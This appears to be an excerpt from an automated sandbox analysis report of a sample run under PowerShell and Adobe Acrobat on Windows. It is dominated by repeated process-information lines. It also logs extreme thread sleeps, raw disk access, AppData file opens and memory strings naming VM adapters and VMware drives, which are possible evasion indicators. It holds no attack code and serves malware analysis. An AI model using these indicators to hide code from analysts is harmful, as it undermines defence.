      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5409Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4298Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6012Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3706Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7304Thread sleep time: -8301034833169293s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7204Thread sleep count: 6012 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep count: 3706 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7236Thread sleep time: -9223372036854770s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 7820Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: powershell.exe, 00000003.00000002.1417398167.000001B086E1D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.1417398167.000001B086E1D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.1417398167.000001B086E1D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
      Source: powershell.exe, 00000003.00000002.1417398167.000001B086E1D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000003.00000002.1417398167.000001B0853D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000000.00000002.1671504647.000001EEE10E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: powershell.exe, 00000003.00000002.1417398167.000001B0853D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
